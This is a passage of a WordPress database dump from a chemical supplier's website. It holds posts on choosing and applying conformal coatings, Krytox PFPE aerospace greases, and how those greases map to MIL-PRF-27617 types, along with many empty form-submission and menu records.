href="https://www.miller-stephenson.com/chemicals/conformal-coatings/urethane-conformal-coating/"><strong>URETHANE:</strong></a> Polyurethane coatings are known for their excellent moisture and chemical resistance and good dielectric properties. They are also very abrasion resistant. Urethanes typically require specialized stripping solvents like <a href="https://www.miller-stephenson.com/product/conformal-coating-stripper/">MS-114</a> Conformal Coating Stripper.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/product/ms-252n/"><strong>VARNISH:</strong></a> Varnish coatings are natural‐based resins that form tough coatings which are moisture resistant materials that lack the flexibility of the above materials, and also have greater variations in insulative properties and stability.</li>\r\n</ul>\r\nEqually as important as choosing the correct resin is proper application and cure of the coating.  To be effective, a coating should completely cover the assembly and provide good coverage of sharp edges (components and component leads) and other contours (solder joints, etc). It may even be essential to coat the edge to generate a ubiquitous layer throughout the entire board or device\r\n<h2><strong><img class="alignleft wp-image-2477" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Coating_-_ge_033.tif.jpg" alt="conformal coating" width="343" height="343" />Applying Conformal Coatings:</strong></h2>\r\nThe effectiveness of the coating is influenced by the efficiency of the application method, which also governs the type of coating used.  Typically coating thickness of 1-2 mil is recommended to ensure coating robustness, uniform coverage, and long-term stability. Thicker coatings can be applied however dielectric properties of the coating may be effected. There are the three main ways of applying a conformal coating:\r\n<ol>\r\n 	<li>Dipping – limited to materials that do not cure quickly by moisture, oxidation or light</li>\r\n 	<li>Selective robotic coating – such as <a href="http://www.nordson.com/en/divisions/asymtek">Asymtek</a>. All coating types can be used if the correct dispense head is selected</li>\r\n 	<li>Spraying – hand spray using a spray booth or aerosol can. All coatings can be applied in this way</li>\r\n</ol>\r\nThe liquid coating application should thoroughly wet all surfaces and cure without leaving surface defects. Defects typically observed are hazy or cloudiness, air bubbles, irregular leveling (known as orange peel), or voids.  These defects can have substantial effects on the final performance of the coating and one should consider re-working the PCB. Cleanliness of the substrate is of extreme importance for the successful application of a coating. Surfaces must be free of moisture, dirt, wax, grease, flux residues and all other contaminants. Contamination under the coating could cause problems that may lead to assembly failures.\r\n\r\n<strong>Miller-Stephenson has been manufacturing and formulating conformal coatings for over 50 years, we have the technical and application expertise to help your team choose, apply, and re-work any conformal coating within our portfolio.  We offer both commercial and MIL-spec coatings, and all of our coatings are held to highest performance standards.  When choosing any of our conformal coating you can expect the following benefits:</strong>\r\n<ul>\r\n 	<li>Simple application- Convenient aerosol or bulk</li>\r\n 	<li>Specialized formulas to provide uniform, thin films</li>\r\n 	<li>Easy removal, repair and replacement</li>\r\n 	<li>100% non-flammable; low odor formulations</li>\r\n 	<li>Superior Protection against thermal and mechanical shock</li>\r\n 	<li>MIL-Spec and Commercial-Spec polymer coatings</li>\r\n</ul>\r\n[ux_product_categories ids="29,28,27,30" number="10"]\r\n\r\nThese products can also be found on Ellsworth <a href="https://www.ellsworth.com/products/conformal-coatings/polyurethane/miller-stephenson-ms-470c-urethane-conformal-coating-clear-14-oz-aerosol/">here.</a>', 'Choosing the Right Conformal Coatings', '', 'inherit', 'closed', 'closed', '', '2474-revision-v1', '', '', '2017-08-09 22:59:44', '2017-08-09 22:59:44', '', 2474, 'https://www.miller-stephenson.com/2474-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4812, 2261, '2017-08-10 13:24:55', '2017-08-10 13:24:55', '', '', '', 'publish', 'closed', 'closed', '', '4812', '', '', '2017-08-10 13:24:56', '2017-08-10 13:24:56', '', 0, 'https://www.miller-stephenson.com/nf_sub/4812/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4814, 1, '2017-08-10 15:46:08', '2017-08-10 15:46:08', '', 'Post', '', 'publish', 'closed', 'closed', '', 'post', '', '', '2017-08-10 15:46:08', '2017-08-10 15:46:08', '', 0, 'https://www.miller-stephenson.com/post/', 0, 'schema', '', 0); 
INSERT INTO `wp_posts` VALUES (4815, 2, '2017-08-10 15:46:08', '2017-08-10 15:46:08', ' ', '', '', 'publish', 'closed', 'closed', '', '4815', '', '', '2017-08-10 15:46:08', '2017-08-10 15:46:08', '', 0, 'https://www.miller-stephenson.com/4815/', 14, 'nav_menu_item', '', 0); 
INSERT INTO `wp_posts` VALUES (4816, 1, '2017-08-10 15:46:10', '2017-08-10 15:46:10', '', 'Page', '', 'publish', 'closed', 'closed', '', 'page', '', '', '2017-08-10 15:46:10', '2017-08-10 15:46:10', '', 0, 'https://www.miller-stephenson.com/page/', 0, 'schema', '', 0); 
INSERT INTO `wp_posts` VALUES (4817, 2, '2017-08-10 15:46:10', '2017-08-10 15:46:10', ' ', '', '', 'publish', 'closed', 'closed', '', '4817', '', '', '2017-08-10 15:46:10', '2017-08-10 15:46:10', '', 0, 'https://www.miller-stephenson.com/4817/', 15, 'nav_menu_item', '', 0); 
INSERT INTO `wp_posts` VALUES (4818, 2, '2017-08-10 15:48:10', '2017-08-10 15:48:10', '', 'ms-large', '', 'inherit', 'closed', 'closed', '', 'ms-large', '', '', '2017-08-10 15:48:10', '2017-08-10 15:48:10', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2017/08/MS-LARGE.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4820, 0, '2017-08-10 18:19:42', '2017-08-10 18:19:42', '', '', '', 'publish', 'closed', 'closed', '', '4820', '', '', '2017-08-10 18:19:42', '2017-08-10 18:19:42', '', 0, 'https://www.miller-stephenson.com/nf_sub/4820/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4821, 0, '2017-08-11 12:54:47', '2017-08-11 12:54:47', '', '', '', 'publish', 'closed', 'closed', '', '4821', '', '', '2017-08-11 12:54:47', '2017-08-11 12:54:47', '', 0, 'https://www.miller-stephenson.com/nf_sub/4821/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4822, 0, '2017-08-11 17:18:11', '2017-08-11 17:18:11', '', '', '', 'publish', 'closed', 'closed', '', '4822', '', '', '2017-08-11 17:18:11', '2017-08-11 17:18:11', '', 0, 'https://www.miller-stephenson.com/nf_sub/4822/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4823, 0, '2017-08-11 17:23:19', '2017-08-11 17:23:19', '', '', '', 'publish', 'closed', 'closed', '', '4823', '', '', '2017-08-11 17:23:19', '2017-08-11 17:23:19', '', 0, 'https://www.miller-stephenson.com/nf_sub/4823/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4824, 0, '2017-08-11 20:07:06', '2017-08-11 20:07:06', '', '', '', 'publish', 'closed', 'closed', '', '4824', '', '', '2017-08-11 20:07:06', '2017-08-11 20:07:06', '', 0, 'https://www.miller-stephenson.com/nf_sub/4824/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4825, 0, '2017-08-11 22:16:28', '2017-08-11 22:16:28', '', '', '', 'publish', 'closed', 'closed', '', '4825', '', '', '2017-08-11 22:16:29', '2017-08-11 22:16:29', '', 0, 'https://www.miller-stephenson.com/nf_sub/4825/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4826, 0, '2017-08-12 16:04:56', '2017-08-12 16:04:56', '', '', '', 'publish', 'closed', 'closed', '', '4826', '', '', '2017-08-12 16:04:56', '2017-08-12 16:04:56', '', 0, 'https://www.miller-stephenson.com/nf_sub/4826/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4827, 0, '2017-08-14 01:13:07', '2017-08-14 01:13:07', '', '', '', 'publish', 'closed', 'closed', '', '4827', '', '', '2017-08-14 01:13:07', '2017-08-14 01:13:07', '', 0, 'https://www.miller-stephenson.com/nf_sub/4827/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4828, 0, '2017-08-14 07:58:44', '2017-08-14 07:58:44', '', '', '', 'publish', 'closed', 'closed', '', '4828', '', '', '2017-08-14 07:58:44', '2017-08-14 07:58:44', '', 0, 'https://www.miller-stephenson.com/nf_sub/4828/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4829, 0, '2017-08-14 11:25:38', '2017-08-14 11:25:38', '', '', '', 'publish', 'closed', 'closed', '', '4829', '', '', '2017-08-14 11:25:38', '2017-08-14 11:25:38', '', 0, 'https://www.miller-stephenson.com/nf_sub/4829/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4830, 0, '2017-08-14 12:25:44', '2017-08-14 12:25:44', '', '', '', 'publish', 'closed', 'closed', '', '4830', '', '', '2017-08-14 12:25:45', '2017-08-14 12:25:45', '', 0, 'https://www.miller-stephenson.com/nf_sub/4830/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4831, 0, '2017-08-14 12:49:50', '2017-08-14 12:49:50', '', '', '', 'publish', 'closed', 'closed', '', '4831', '', '', '2017-08-14 12:49:51', '2017-08-14 12:49:51', '', 0, 'https://www.miller-stephenson.com/nf_sub/4831/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4832, 0, '2017-08-14 15:38:26', '2017-08-14 15:38:26', '', '', '', 'publish', 'closed', 'closed', '', '4832', '', '', '2017-08-14 15:38:26', '2017-08-14 15:38:26', '', 0, 'https://www.miller-stephenson.com/nf_sub/4832/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4833, 0, '2017-08-14 16:33:57', '2017-08-14 16:33:57', '', '', '', 'publish', 'closed', 'closed', '', '4833', '', '', '2017-08-14 16:33:57', '2017-08-14 16:33:57', '', 0, 'https://www.miller-stephenson.com/nf_sub/4833/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4834, 0, '2017-08-14 16:37:44', '2017-08-14 16:37:44', '', '', '', 'publish', 'closed', 'closed', '', '4834', '', '', '2017-08-14 16:37:44', '2017-08-14 16:37:44', '', 0, 'https://www.miller-stephenson.com/nf_sub/4834/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4835, 0, '2017-08-14 17:32:12', '2017-08-14 17:32:12', '', '', '', 'publish', 'closed', 'closed', '', '4835', '', '', '2017-08-14 17:32:12', '2017-08-14 17:32:12', '', 0, 'https://www.miller-stephenson.com/nf_sub/4835/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4836, 3, '2017-08-14 17:54:40', '2017-08-14 17:54:40', '<h2>Krytox™ 240AC Aerospace and Aviation Grease</h2>\n<h3>High Performance PFPE Lubricant; Unmatched Performance; MIL-SPEC PRF-27617 Type III</h3>\nKrytox 240AC grease is based on perfluoropolyether (PFPE) oils. These synthetic fluorinated lubricants are used in extreme conditions such as continuous high temperatures up to 300 °C (572 °F) and higher temperatures for shorter periods, depending on product grade limits. Chemically inert and safe for use around hazardous chemicals, these lubricants are nonflammable and are safe for use in oxygen service. Krytox oils and greases are silicone free and do not damage plastics or elastomers or cause corrosion to metals. They are commonly used as lubricants in aerospace, automotive, industrial and semiconductor applications as well as solving many other routine lubrication problems. Krytox greases are the original products that this military specification was written for and have been certified continuously since the specification was originally written. This is the latest data from the re-certification that is required every five years. Krytox greases are standard as NLGI Grade 2 penetration. If the 240 AZ is ordered to meet MIL-SPEC requirements, it must be ordered as NLGI Grade 1 to meet the specification.\n\nApplications for Krytox 240AC lubricants are generally of a critical nature with temperatures in all industries reaching extremes for conventional lubricants. They are expected to be durable in the most aggressive environments and are now often considered an integral part of the design. Where failure of components is not an option, whether because of durability, warranty, safety, loss of productivity or down time, Krytox is the lubricant of choice in a wide range of industries and applications.\n<h3>Superior Performance, Temperature Stability, and</h3>\nIn the aerospace industry, Krytox 240AC grease is applied on various settings spanning from bearings and sealants to o-rings and oxygen systems. Krytox is a valuable asset to the aerospace industry due to its superior performance in a wide range of temperatures scaling from 70 to 399ºC (–100 to 750 ºF). In addition, it is robust in harsh environments and has excellent frictional properties, allowing it to resist change in properties over time, provide longer wear, and lower energy consumption. Krytox lubricants are compatible with all metals, elastomers, plastics, paints and finishes. Due to the intense and severe circumstance of the aerospace industry, it can be expected that Krytox delivers a high level of product excellence.', '240AC', 'Krytox 240 AZ, 240 AB and 240 AC are MIL PRF-27617 greases. If Krytox 240 AZ is ordered to meet MIL-SPEC requirements, it must be ordered as NLGI Grade 1 to meet the specification.\n\nKrytox 240 AC, 240 AB and 240 AZ gr-1 greases now have NSF approval for incidental food contact (H-1) in and around food processing areas.\n\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '644-autosave-v1', '', '', '2017-08-14 17:54:40', '2017-08-14 17:54:40', '', 644, 'https://www.miller-stephenson.com/644-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4837, 0, '2017-08-15 16:34:14', '2017-08-15 16:34:14', '', '', '', 'publish', 'closed', 'closed', '', '4837', '', '', '2017-08-15 16:34:14', '2017-08-15 16:34:14', '', 0, 'https://www.miller-stephenson.com/nf_sub/4837/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4838, 0, '2017-08-15 17:16:39', '2017-08-15 17:16:39', '', '', '', 'publish', 'closed', 'closed', '', '4838', '', '', '2017-08-15 17:16:40', '2017-08-15 17:16:40', '', 0, 'https://www.miller-stephenson.com/nf_sub/4838/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4839, 0, '2017-08-15 22:28:20', '2017-08-15 22:28:20', '', '', '', 'publish', 'closed', 'closed', '', '4839', '', '', '2017-08-15 22:28:20', '2017-08-15 22:28:20', '', 0, 'https://www.miller-stephenson.com/nf_sub/4839/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4840, 0, '2017-08-16 12:43:55', '2017-08-16 12:43:55', '', '', '', 'publish', 'closed', 'closed', '', '4840', '', '', '2017-08-16 12:43:56', '2017-08-16 12:43:56', '', 0, 'https://www.miller-stephenson.com/nf_sub/4840/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4841, 0, '2017-08-16 18:48:15', '2017-08-16 18:48:15', '', '', '', 'publish', 'closed', 'closed', '', '4841', '', '', '2017-08-16 18:48:15', '2017-08-16 18:48:15', '', 0, 'https://www.miller-stephenson.com/nf_sub/4841/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4842, 0, '2017-08-16 19:47:31', '2017-08-16 19:47:31', '', '', '', 'publish', 'closed', 'closed', '', '4842', '', '', '2017-08-16 19:47:31', '2017-08-16 19:47:31', '', 0, 'https://www.miller-stephenson.com/nf_sub/4842/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4843, 0, '2017-08-16 22:49:26', '2017-08-16 22:49:26', '', '', '', 'publish', 'closed', 'closed', '', '4843', '', '', '2017-08-16 22:49:27', '2017-08-16 22:49:27', '', 0, 'https://www.miller-stephenson.com/nf_sub/4843/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4844, 0, '2017-08-17 08:18:22', '2017-08-17 08:18:22', '', '', '', 'publish', 'closed', 'closed', '', '4844', '', '', '2017-08-17 08:18:22', '2017-08-17 08:18:22', '', 0, 'https://www.miller-stephenson.com/nf_sub/4844/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4845, 0, '2017-08-17 10:01:54', '2017-08-17 10:01:54', '', '', '', 'publish', 'closed', 'closed', '', '4845', '', '', '2017-08-17 10:01:54', '2017-08-17 10:01:54', '', 0, 'https://www.miller-stephenson.com/nf_sub/4845/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4846, 0, '2017-08-17 10:30:17', '2017-08-17 10:30:17', '', '', '', 'publish', 'closed', 'closed', '', '4846', '', '', '2017-08-17 10:30:18', '2017-08-17 10:30:18', '', 0, 'https://www.miller-stephenson.com/nf_sub/4846/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4847, 0, '2017-08-17 14:57:44', '2017-08-17 14:57:44', '', '', '', 'publish', 'closed', 'closed', '', '4847', '', '', '2017-08-17 14:57:44', '2017-08-17 14:57:44', '', 0, 'https://www.miller-stephenson.com/nf_sub/4847/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4848, 0, '2017-08-17 17:25:57', '2017-08-17 17:25:57', '', '', '', 'publish', 'closed', 'closed', '', '4848', '', '', '2017-08-17 17:25:57', '2017-08-17 17:25:57', '', 0, 'https://www.miller-stephenson.com/nf_sub/4848/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4849, 0, '2017-08-17 22:44:53', '2017-08-17 22:44:53', '', '', '', 'publish', 'closed', 'closed', '', '4849', '', '', '2017-08-17 22:44:53', '2017-08-17 22:44:53', '', 0, 'https://www.miller-stephenson.com/nf_sub/4849/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4850, 0, '2017-08-17 23:16:59', '2017-08-17 23:16:59', '', '', '', 'publish', 'closed', 'closed', '', '4850', '', '', '2017-08-17 23:16:59', '2017-08-17 23:16:59', '', 0, 'https://www.miller-stephenson.com/nf_sub/4850/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4851, 0, '2017-08-18 01:02:13', '2017-08-18 01:02:13', '', '', '', 'publish', 'closed', 'closed', '', '4851', '', '', '2017-08-18 01:02:13', '2017-08-18 01:02:13', '', 0, 'https://www.miller-stephenson.com/nf_sub/4851/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4852, 0, '2017-08-18 04:23:05', '2017-08-18 04:23:05', '', '', '', 'publish', 'closed', 'closed', '', '4852', '', '', '2017-08-18 04:23:06', '2017-08-18 04:23:06', '', 0, 'https://www.miller-stephenson.com/nf_sub/4852/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4853, 0, '2017-08-18 12:41:04', '2017-08-18 12:41:04', '', '', '', 'publish', 'closed', 'closed', '', '4853', '', '', '2017-08-18 12:41:05', '2017-08-18 12:41:05', '', 0, 'https://www.miller-stephenson.com/nf_sub/4853/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4854, 2, '2017-08-18 13:25:18', '2017-08-18 13:25:18', '', 'Become a Reseller', '', 'publish', 'closed', 'closed', '', '4854', '', '', '2017-08-18 15:11:22', '2017-08-18 15:11:22', '', 0, 'https://www.miller-stephenson.com/4854/', 16, 'nav_menu_item', '', 0); 
INSERT INTO `wp_posts` VALUES (4855, 2, '2017-08-18 15:42:10', '2017-08-18 15:42:10', '<h2>Krytox 240AC Aerospace and Aviation Grease</h2>\n<h3>High Performance PFPE Lubricant; Unmatched Performance; MIL-SPEC PRF-27617 Type III</h3>\nKrytox 240AC grease is based on perfluoropolyether (PFPE) oils. These synthetic fluorinated lubricants are used in extreme conditions such as continuous high temperatures up to 300 °C (572 °F) and higher temperatures for shorter periods, depending on product grade limits. Chemically inert and safe for use around hazardous chemicals, these lubricants are nonflammable and are safe for use in oxygen service. Krytox oils and greases are silicone free and do not damage plastics or elastomers or cause corrosion to metals. They are commonly used as lubricants in aerospace, automotive, industrial and semiconductor applications as well as solving many other routine lubrication problems. Krytox greases are the original products that this military specification was written for and have been certified continuously since the specification was originally written. This is the latest data from the re-certification that is required every five years. Krytox greases are standard as NLGI Grade 2 penetration. If the 240 AZ is ordered to meet MIL-SPEC requirements, it must be ordered as NLGI Grade 1 to meet the specification.\n\nApplications for Krytox 240AC lubricants are generally of a critical nature with temperatures in all industries reaching extremes for conventional lubricants. They are expected to be durable in the most aggressive environments and are now often considered an integral part of the design. Where failure of components is not an option, whether because of durability, warranty, safety, loss of productivity or down time, Krytox is the lubricant of choice in a wide range of industries and applications.\n<h3>Krytox™ 240AC - Superior Performance, Temperature Stability, and Reduction in Wear</h3>\nIn the aerospace industry, Krytox 240AC grease is applied on various settings spanning from bearings and sealants to o-rings and oxygen systems. Krytox is a valuable asset to the aerospace industry due to its superior performance in a wide range of temperatures scaling from 70 to 399ºC (–100 to 750 ºF). In addition, it is robust in harsh environments and has excellent frictional properties, allowing it to resist change in properties over time, provide longer wear, and lower energy consumption. Krytox lubricants are compatible with all metals, elastomers, plastics, paints, and finishes. Due to the intense and severe circumstance of the aerospace industry, it can be expected that Krytox delivers a high level of product excellence.\n\nKrytox™ is a trademark of the Chemours Company FC, LLC.', 'Krytox 240AC', 'Krytox 240AC is a MIL PRF-26717 and NSF H-1 Rated grease. It also meets many ASTM specifications. Krytox 240AC has a viscosity of 800 at 20°C and 270 cSt at 38°C making it ideal in situations where a high viscosity grease is required. The ideal temperature of this grease is -34 to 288°C. \n<br><br/>\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '644-autosave-v1', '', '', '2017-08-18 15:42:10', '2017-08-18 15:42:10', '', 644, 'https://www.miller-stephenson.com/644-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4856, 0, '2017-08-18 17:05:06', '2017-08-18 17:05:06', '', '', '', 'publish', 'closed', 'closed', '', '4856', '', '', '2017-08-18 17:05:06', '2017-08-18 17:05:06', '', 0, 'https://www.miller-stephenson.com/nf_sub/4856/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4857, 0, '2017-08-18 17:38:01', '2017-08-18 17:38:01', '', '', '', 'publish', 'closed', 'closed', '', '4857', '', '', '2017-08-18 17:38:01', '2017-08-18 17:38:01', '', 0, 'https://www.miller-stephenson.com/nf_sub/4857/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4858, 0, '2017-08-18 18:22:25', '2017-08-18 18:22:25', '', '', '', 'publish', 'closed', 'closed', '', '4858', '', '', '2017-08-18 18:22:26', '2017-08-18 18:22:26', '', 0, 'https://www.miller-stephenson.com/nf_sub/4858/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4859, 2, '2017-08-18 18:54:27', '2017-08-18 18:54:27', '<h2>Krytox 240AD Aerospace &amp; Aviation Grease</h2>\nApplications for Krytox 240AD lubricants are generally of a critical nature with temperatures in all industries reaching extremes for conventional lubricants. They are expected to be durable in the most aggressive environments and are now often considered an integral part of the design. Where failure of components is not an option, whether because of durability, warranty, safety, loss of productivity or down time, Krytox is the lubricant of choice in a wide range of industries and applications.\n\nIn the aerospace industry, Krytox 240AD grease is applied on various settings spanning from bearings and sealants to o-rings and oxygen systems. Krytox is a valuable asset to the aerospace industry due to its superior performance in a wide range of temperatures scaling from 70 to 399ºC (–100 to 750 ºF). In addition, it is robust in harsh environments and has excellent frictional properties, allowing it to resist change in properties over time, provide longer wear, and lower energy consumption. Krytox lubricants are compatible with all metals, elastomers, plastics, paints and finishes. Due to the intense and severe circumstance of the aerospace industry, it can be expected that Krytox delivers a high level of product excellence.\n\nNew bearings and equipment that are not lubricated often have rust preventive oils in them to prevent damage while they are in storage before use. New bearings should be inspected for damage and cleanliness before use. The greases or preservative oils need to be removed when using Krytox as a lubricant. Failure to do so could result in reduced bearing life. Bearing life tests on uncleaned bearings have shown reduced life in high temperature, high speed tests where the bearing was filled with a minimum amount of grease. The preservatives coat the metal surface to prevent rusting so they can also prevent the grease from adhering, causing them to be thrown off by the action of the bearing. They also will oxidize and harden and can create debris which will contaminate the grease.', '240AD', 'Krytox 240AD is the highest viscosity grease in the 240 series. With a viscosity of 1540 at 20°C and a viscosity of 502 at 38°C it is ideal for applications that require a thick grease. This grease does not meet the MIL SPEC. \n<br><br/>\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '645-autosave-v1', '', '', '2017-08-18 18:54:27', '2017-08-18 18:54:27', '', 645, 'https://www.miller-stephenson.com/645-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4860, 2, '2017-08-18 19:54:45', '2017-08-18 19:54:45', '<h2>Military Specification Lubrication | Mil-Spec Lubrication</h2>\r\nA United States <b>defense standard</b>, often called a <b>military standard</b>, “<b>MIL-STD</b>“, “<b>MIL-SPEC</b>“, or (informally) “<b>MilSpecs</b>“, is used to help achieve standardization objectives by the U.S. Department of Defense. Standardization is beneficial in achieving interoperability, ensuring products meet certain requirements, commonality, reliability, the total cost of ownership, compatibility with logistics systems, and similar defense-related objectives.\r\n\r\nSpecialized MIL-Specs (MIL-PRF-27617) were developed to cover the requirements for greases resistant to hydrocarbon fuel and liquid oxygen specifically applicable in aircraft, aerospace vehicles, and supporting equipment. These fuel resistant greases are intended for use in the lubrication of taper plug valves, gaskets, and bearings in fuel systems of aircraft and ground support equipment. It is also suitable for use in the presence of liquid oxygen as a lubricant for valves, threads, and bearings in aerospace vehicles. Within the MIL-PRF-27617 there are delineations into sub-types,  Type I-V.  These ‘Types’ have specified parameters and performance metrics defined within them that lubricants must meet to be utilized in applications which call for that MIL-SPEC Type.\r\n\r\nDefense standards are also used by other nondefense government organizations, technical organizations, and industry. This article discusses definitions, history, and usage of defense standards. Related documents, such as <b>defense handbooks</b> and <b>defense specifications</b>, are also addressed.\r\n\r\nhttps://en.wikipedia.org/wiki/United_States_Military_Standard\r\n<h3>MIL-SPEC PRF-27617 TYPE I</h3>\r\n<div class="vc_row wpb_row vc_row-fluid">\r\n<div class="wpb_column vc_column_container vc_col-sm-12">\r\n<div class="vc_column-inner ">\r\n<div class="wpb_wrapper">\r\n<div class="wpb_text_column wpb_content_element ">\r\n<div class="wpb_wrapper">\r\n<div class="vc_row wpb_row vc_row-fluid">\r\n<div class="wpb_column vc_column_container vc_col-sm-6">\r\n<div class="vc_column-inner ">\r\n<div class="wpb_wrapper">\r\n<div class="wpb_wrapper">\r\n\r\nMIL-PRF-27617 Type I performance lubricant requirements typically require lower temperature range and lower viscosity greases and are not designed for high-temperature applications. However, they exhibit high penetration, no oil separation, and complete oxygen stability. An excellent representation of a lubricant which excels within this MIL-SPEC is <a href="https://www.miller-stephenson.com/product/krytox-240az/"><strong>Krytox™ 240AZ. </strong></a>\r\n\r\n</div>\r\n<h3>MIL-SPEC PRF-27617 TYPE II</h3>\r\n<div class="vc_row wpb_row vc_row-fluid">\r\n<div class="wpb_column vc_column_container vc_col-sm-12">\r\n<div class="vc_column-inner ">\r\n<div class="wpb_wrapper">\r\n<div class="wpb_text_column wpb_content_element ">\r\n<div class="wpb_wrapper">\r\n\r\nMIL-SPEC PRF 27617 Type II lubricants have increased temperature stability range from -40 to 204 C and offer exceptional chemical and thermal stability, minimal evaporation, low hydrocarbon fuel solubility, and &lt;20% water-washout while providing NGLI 2 penetration.  One of the highest-performing lubricants which conform to the Type II specifications is <a href="https://www.miller-stephenson.com/product/krytox-240ab/"><strong>Krytox™ 240AB</strong>.</a>\r\n<h3>MIL-SPEC PRF-27617 TYPE III</h3>\r\n<div class="vc_row wpb_row vc_row-fluid">\r\n<div class="wpb_column vc_column_container vc_col-sm-6">\r\n<div class="vc_column-inner ">\r\n<div class="wpb_wrapper">\r\n<div class="wpb_text_column wpb_content_element ">\r\n<div class="wpb_wrapper">\r\n\r\nMIL-SPEC 27617 Type III greases exhibit NLGI 2 penetration, extremely high temperature, and oxidation stability, &lt;20% solubility in a hydrocarbon fuel, and minimal evaporation at 200 C. An industry standard which exceeds all of these metrics and is well-known for offering unmatched performance is <a href="https://www.miller-stephenson.com/product/krytox-240ac/"><strong>Krytox™</strong> <strong>240AC.</strong></a>\r\n<div class="vc_row wpb_row vc_row-fluid">\r\n<div class="wpb_column vc_column_container vc_col-sm-12">\r\n<div class="vc_column-inner ">\r\n<div class="wpb_wrapper">\r\n<div class="wpb_text_column wpb_content_element ">\r\n<div class="wpb_wrapper">\r\n<h3>MIL-SPEC PRF-27617 TYPE IV</h3>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="vc_row wpb_row vc_row-fluid">MIL-SPEC PRF 26717 Type IV greases must exhibit minimal evaporation,  low fuel solubility, complete oxygen stability, offer excellent resistance to extreme pressure over wide temperature range, and modest changes in worked vs unworked penetrations. Known for its unsurpassed performance, <a href="https://www.miller-stephenson.com/product/krytox-fpg-028/"><strong>Krytox™</strong><strong> FPG 028</strong> </a>delivers top-tier performance in all critical physical properties and is designed to operate under severe conditions, and can be used for bearings, gears, and as a lubricant for O-rings and elastomers.</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="vc_row wpb_row vc_row-fluid"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="vc_row wpb_row vc_row-fluid"></div>', 'How Krytox Meets the Mil-Spec Standards for Lubrication', '', 'publish', 'closed', 'closed', '', 'what-is-mil-spec', '', '', '2017-08-18 19:59:02', '2017-08-18 19:59:02', '', 0, 'https://www.miller-stephenson.com/?p=4860', 0, 'post', '', 0); 
